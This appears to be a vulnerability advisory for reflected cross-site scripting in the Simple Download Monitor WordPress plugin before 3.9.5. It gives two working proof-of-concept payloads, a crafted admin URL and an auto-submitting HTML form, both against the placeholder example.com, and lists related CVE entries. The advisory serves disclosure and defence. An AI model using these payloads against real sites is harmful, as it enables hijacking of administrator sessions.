Lucene search
Apple502jWPEX-ID:EF9AE513-6C29-45C2-B5AE-4A06A217C499HistoryOct 05, 2021 - 12:00 a.m.
Simple Download Monitor < 3.9.5 - Reflected Cross-Site Scripting
2021-10-0500:00:00
apple502j
262
0.001 Low
EPSS
Percentile
41.4%
The plugin does not escape the 1) sdm_active_tab GET parameter and 2) sdm_stats_start_date/sdm_stats_end_date POST parameters before outputting them back in attributes, leading to Reflected Cross-Site Scripting issues
PoC 1: This requires Firefox due to onclick+accesskey trick on hidden input. There is another injection point, but magic quotes are doing its job (it's inside badly-enqueued inline JS)
1) Go to https://example.com/wp-admin/edit.php?post_type=sdm_downloads&page=sdm-stats&sdm_active_tab=browserList%22+accesskey%3DA+onclick%3Dalert%28origin%29%2F%2F
2) Press Alt-Shift-A (Windows) or Cmd-Alt-A (macOS)
PoC 2: This does not have browser requirement.
<form action="https://example.com/wp-admin/edit.php?post_type=sdm_downloads&page=sdm-stats&sdm_active_tab=browserList" method="post" id="xss">
<input type="hidden" name="sdm_stats_start_date" value="" style=animation-name:rotation onanimationend=alert(origin)//">
</form>
<script>xss.submit()</script>Related
cve
cve
CVE-2021-24697
2021-11-08 18:15:09
nvd
nvd
CVE-2021-24697
2021-11-08 18:15:09
patchstack
patchstack
cnvd
cnvd
WordPress Plugin Cross-Site Scripting Vulnerability (CNVD-2021-101465)
2021-11-10 00:00:00
wpvulndb
wpvulndb
Simple Download Monitor < 3.9.5 - Reflected Cross-Site Scripting
2021-10-05 00:00:00
prion
prion
Cross site scripting
2021-11-08 18:15:00
cvelist
cvelist